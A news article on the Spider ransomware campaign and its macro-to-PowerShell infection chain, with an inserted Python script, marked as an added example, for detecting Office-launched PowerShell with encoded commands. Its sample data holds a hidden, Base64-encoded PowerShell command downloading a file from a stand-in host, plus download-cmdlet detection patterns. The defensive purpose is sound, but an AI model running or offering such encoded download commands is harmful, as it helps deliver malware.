PC Users Targeted by Spider Ransomware


Security researchers reported that they found a new ransomware family while analyzing a mid-scale campaign over the weekend. The new threat is called Spider ransomware, and it uses decoy documents auto-synced to enterprise cloud storage and collaboration applications.

According to the experts, the Spider ransomware is being distributed via an Office document which targets users in Bosnia and Herzegovina, Serbia, and Croatia.

The spam emails are written as if the sender is collecting a debt from the recipient, tricking the user into opening the attached file.

However, the obfuscated macro code embedded in the Office document launches a Base64-encoded PowerShell script that downloads the malicious payload.

Once the system is infected, the ransomware starts encrypting the user’s files and adds the ‘.spider’ extension to each affected file.
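The infection chain described above (an Office macro starting PowerShell with a Base64-encoded command) can be hunted for in process-creation logs. The following is an added example, not code from the Netskope report: the event field names, the sample events, and the `example.invalid` URL are all constructed for illustration.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# PowerShell accepts -EncodedCommand and abbreviations such as -e, -enc and -ec.
FLAG = re.compile(r"(?i)(?:^|\s)-(e\w*)\s+([A-Za-z0-9+/=]{8,})")
DOWNLOAD_HINT = re.compile(r"(?i)downloadfile|downloadstring|invoke-webrequest|start-bitstransfer")

def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    for m in FLAG.finditer(cmdline):
        flag = m.group(1).lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                # -EncodedCommand takes Base64 over UTF-16LE text.
                return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
            except ValueError:  # bad Base64 or bad UTF-16
                return None
    return None

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def flag_events(events):
    """Return (parent, decoded_script, looks_like_download) for Office -> PowerShell launches."""
    hits = []
    for ev in events:
        if basename(ev["parent"]) in OFFICE_PARENTS and basename(ev["image"]) in SHELLS:
            script = decode_encoded_command(ev["cmdline"])
            if script is not None:
                hits.append((ev["parent"], script, bool(DOWNLOAD_HINT.search(script))))
    return hits

# Constructed sample data (not taken from the campaign).
SAMPLE_SCRIPT = "Invoke-WebRequest http://example.invalid/a.bin -OutFile a.bin"
_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Office\WINWORD.EXE", "image": PS,
     "cmdline": "powershell -NoP -W Hidden -enc " + _B64},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell -enc " + _B64},
    {"parent": r"C:\Office\WINWORD.EXE", "image": PS,
     "cmdline": "powershell -ExecutionPolicy Unrestricted -File report.ps1"},
]

if __name__ == "__main__":
    for parent, script, downloads in flag_events(SAMPLE_EVENTS):
        print(f"{parent} -> PowerShell, download={downloads}: {script}")
```

Only the first sample event is flagged: the second has a non-Office parent, and the third carries no encoded command.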

Fortunately, a decrypter was created to display the user interface and let users decrypt the files using a decryption key. It is executed alongside the encrypter; however, it runs in the background until the encryption process has been completed.

According to Netskope’s expert Amit Malik, the Spider decrypter monitors system processes and prevents the launch of tools like taskmgr, procexp, msconfig, regedit, cmd, outlook, winword, excel, and msaccess.

During the encryption process, the Spider ransomware skips files in the following folders: tmp, Videos, winnt, Application Data, Spider, PrefLogs, Program Files (x86), Program Files, ProgramData, Temp, Recycle, System Volume Information, Boot, and Windows.

When the encryption process is completed, the decrypter displays a warning (available in English and Croatian) to inform users on how to decrypt their files.

Additionally, there is a help section which includes links and references to the resources needed to make the payment, which is approximately $120.

“As ransomware continues to evolve, administrators should educate employees about the impact of ransomware and ensure the protection of the organization’s data by making a regular backup of critical data. In addition to disabling macros by default, users must also be cautious of documents that only contain a message to enable macros to view the contents and also not to execute unsigned macros and macros from untrusted sources,” the Netskope researchers state.

Nelly Vladimirova